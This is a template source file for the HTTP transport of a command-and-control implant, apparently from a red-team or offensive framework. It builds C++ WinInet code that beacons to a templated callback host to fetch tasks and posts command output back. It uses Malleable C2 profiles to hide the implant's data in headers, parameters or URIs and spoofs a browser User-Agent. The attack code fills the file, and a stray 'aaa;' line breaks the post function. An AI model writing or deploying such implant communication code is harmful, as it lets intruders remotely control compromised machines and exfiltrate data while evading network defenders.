[# 
Name: WinInet HTTP get/post functions. 

Explanation: Handles the logic for GET (Tasking) and POST (Response) for the WinInet listener.
Includes logic for Malleable C2 transforms and dynamic placement of data (headers vs body).

Required Keys:
 - http_get_uri: URI of GET endpoint for the implant
 - http_get_client_metadata_terminator: Terminator for the GET metadatablock ("header", "print")
 - http_get_client_metadata_terminator_value: Value of terminator (ex, "utmcc")

 - http_get_client_output_terminator: Terminator for the GET client output
 - http_get_client_output_terminator_value: Value of terminator

 - http_post_client_id_terminator: Terminator for the POST client id
 - http_post_client_id_terminator_value: Value of terminator

 - http_post_client_output_terminator: Terminator for the POST client output
 - http_post_client_output_terminator_value: Value of terminator
#]

#include <vector>
#include <iostream>
#include "../protocols/http_wininet/http.h"
#include "../data/transforms/transforms.h"
#include "../data/msgpack/msgpack.h"
#include "../protocols/json/json.h"

[% from 'transform.j2' import render_transform -%]
[% from 'transform_reverse.j2' import render_reverse_transform -%]
[% from 'http_add_headers_or_parameters.j2' import render_add_headers_or_parameters -%]

using namespace std::string_literals;

nlohmann::json get(std::string implant_uuid) {
    // Note: pass a copy of implant_uuid in, as we are going to be potentially heavily editing it. 
    std::string http_response_buffer;

    // Prep metadata as plaintext/unobsfucated
    std::map<std::string, std::string> metadata_map;
    metadata_map["implant_uuid"] = implant_uuid;
    std::vector<uint8_t> metadata_as_msgpack;
    create_metadata(metadata_map, metadata_as_msgpack);

    // Hold bytes in a string container, as all the transforms want a string
    // do NOT change the `metadata` var name prior to templating, it's needed for it
    std::string metadata(metadata_as_msgpack.begin(), metadata_as_msgpack.end());

    //setup default header, which at minumum contains the useragent
    //!! NOTE: Placeholder value, mc2 does not apply here yet
    std::vector<std::wstring> headers = {
            L"User-Agent: GoogleChrome", 
    };

    // --- Malleable C2  ---

    // --- MetaData Transforms ---
    //Transform metadata before it goes out to match the malleablec2 profile
    [%- for transform in http_get_client_metadata_transforms_list %]
    [[ render_transform(transform, 'metadata') ]]
    [%- endfor %]
    // --- End MetaData Transforms ---

    //base variables declared near top so they are in scope
    // Start with the base URI from the profile
    std::wstring uri = L"[[ http_get_uri ]]";
    std::string request_body = ""; // NULL by default, as that's what the wininet wants
    std::wstring w_metadata(metadata.begin(), metadata.end()); //convert metadata str to w_metadata for winapi (wide)

    [# HTTP_GET: METADATA: HEADER - IF MC2 says it wants a header for where to find the metadata... #]
    [%- if http_get_client_metadata_terminator == "header" %]
    headers.push_back(L"[[http_get_client_metadata_terminator_value]]: " + w_metadata);
    [% endif %]

    [# HTTP_GET: METADATA: PARAMETER - IF MC2 says it wants a header for where to find the metadata... #]
    [#(e.g., /search?q=BASE64...)#]
    [%- if http_get_client_metadata_terminator == "parameter" %]
    // Append '?' or '&' depending on existing query string
    if (uri.find(L'?') != std::wstring::npos) {
        uri += L"&";
    } else {
        uri += L"?";
    }
    uri += L"[[http_get_client_metadata_terminator_value]]";
    uri += L"=";
    uri += w_metadata;
    [% endif %]

    [# HTTP_GET: METADATA: URI - IF MC2 says it wants a header for where to find the metadata... #]
    [%- if http_get_client_metadata_terminator == "uri-append" %]

    //could use append from transform here too 
    uri += w_metadata;
    [% endif %]


    [# HTTP_GET: METADATA: PRINT - IF MC2 says it wants a header for where to find the metadata... #]
    [%- if http_get_client_metadata_terminator == "print" %]

    //convert back to string for HTTP_GET function
    request_body.assign(w_metadata.begin(), w_metadata.end());
    [%- endif %]

    // --- End Malleable C2 Metadata transport method ---

    // --- Add addtl headers/params as specified in mc2 b4 sending off. ---
    [%- for header_or_param in http_get_client_headers_or_parameters_list %]
    [[ render_add_headers_or_parameters(header_or_param) ]]
    [%- endfor %]
    // --- end --- 

    // Call the HTTP_GET
    // Note: We pass the constructed 'uri' and 'headers' here
    //if (HTTP_GET(L"[[callback_host]]", [[callback_port]], L"[[http_get_verb]]", uri, L"[[http_user_agent]]", headers, request_body, http_response_buffer)) {
    if (HTTP_GET(L"[[callback_host]]", [[callback_port]], L"[[http_get_verb]]", uri, headers, request_body, http_response_buffer)) {

        if (http_response_buffer.empty()){
            return nullptr;
        }

        // --- Reverse Transforms for Server output ---

        [%- for transform in http_get_server_output_transforms_list %]
        [[ render_reverse_transform(transform, 'http_response_buffer') ]]
        [%- endfor %]

        // --- End Reverse Transforms for Server output ---

        try {
            nlohmann::json result = nlohmann::json::from_msgpack(http_response_buffer);
            return result;
        }
        catch (nlohmann::json::parse_error& e) {
            std::cerr << "JSON Parse Error: " << e.what() << std::endl;
            std::cerr << "Byte position of error: " << e.byte << std::endl;
            
            // PRINT THE RAW HEX to see what you actually received
            std::cerr << "Raw Buffer (Hex): ";
            for (auto byte : http_response_buffer) {
                printf("%02X ", (unsigned char)byte);
            }
            std::cout << std::endl;
            
            return nlohmann::json(); // Return null json to prevent crash
        }

        //return decode_msgpack_task(http_response_buffer);
    }

    return nullptr;
}

int post(std::string implant_uuid, std::string output_data, std::string task_uuid) {
    // Prep Payload
    std::vector<uint8_t> task_response_msgpack;
    create_task_response(implant_uuid, task_uuid, output_data, task_response_msgpack);
    std::string payload(task_response_msgpack.begin(), task_response_msgpack.end());

    // --- Transforms for ID and Output ---

    //Transform ID as specified by malleablec2
    [% for transform in http_post_client_id_transforms_list %]
    [[ render_transform(transform, 'implant_uuid') ]]
    [%- endfor %]

    //Transform msgpack output as specified by malleablec2
    [% for transform in http_post_client_output_transforms_list %]
    [[ render_transform(transform, 'payload') ]]
    [%- endfor %]
    // --- End Transforms for ID and Output ---


    // convert to w strings because winapi wants that
    std::wstring w_payload(payload.begin(), payload.end());
    std::wstring w_id(implant_uuid.begin(), implant_uuid.end());

    //setup default header, which at minumum contains the useragent
    //!! NOTE: Placeholder value, mc2 does not apply here yet
    std::vector<std::wstring> headers = {
            L"User-Agent: GoogleChrome", 
    };
    std::wstring uri = L"[[ http_post_uri ]]";
    std::string final_post_body = ""; 


    // --- Malleable C2 ID/Output transport method ---

    [% if http_post_client_id_terminator == "header" %]

        //Hold ID in [[ http_post_client_id_terminator_value ]]
        headers.push_back(L"[[ http_post_client_id_terminator_value ]]: " + w_id);

    [%- endif %]

    [%- if http_post_client_id_terminator == "parameter" %]
        
        //POST data stored in parameter [[http_post_client_id_terminator]]
        if (uri.find(L'?') != std::wstring::npos) {
            // URI already has query parameters
            uri += L"&";
        } else {
            // First query parameter
            uri += L"?";
        }
        uri += L"[[ http_post_client_id_terminator_value ]]=" + w_id;

    [%- endif %]
    
    [%- if http_post_client_id_terminator == "uri-append" %]

    //could use append from transform here too
    uri += w_id;

    [% endif %]
    aaa;

    // 5. Handle Output Placement
    [# no %- here, as otherwise the previous comment adds the below headers line in #]
    [% if http_post_client_output_terminator == "header" %]

    headers.push_back(L"[[ http_post_client_output_terminator_value ]]: " + w_payload);

    [%- endif %]

    [% if http_post_client_output_terminator == "print" %]

    //convert back to string for HTTP_POST function
    final_post_body.assign(w_payload.begin(), w_payload.end());

    [%- endif %]

    [% if http_post_client_output_terminator == "parameter" %]

    // This is dangerous for large output, but Malleable C2 allows it
    std::wstring w_body_param(w_payload.begin(), w_payload.end());
    if (uri.find(L"?") != std::wstring::npos) uri += L"&"; else uri += L"?";
    uri += L"[[ http_post_client_output_terminator_value ]]=" + w_body_param;

    [%- endif %]

    [%- if http_post_client_output_terminator == "uri-append" %]

    //could use append from transform here too
    uri += w_payload;

    [% endif %]


    // --- Add addtl headers/params as specified in mc2 b4 sending off ---
    [%- for header_or_param in http_post_client_headers_or_parameters_list %]
    [[ render_add_headers_or_parameters(header_or_param) ]]
    [%- endfor %]
    // --- end ---

    // --- End Malleable C2 ID/Output transport method ---

    // send data back to server
    std::string response_buffer;
    if (!HTTP_POST(L"[[callback_host]]", [[callback_port]], L"[[http_post_verb]]", uri, headers, final_post_body, response_buffer)) {
        //for debugging, remove cerr on prod
        std::cerr << "Error posting data" << std::endl;
        return 1;
    }
    return 0;
}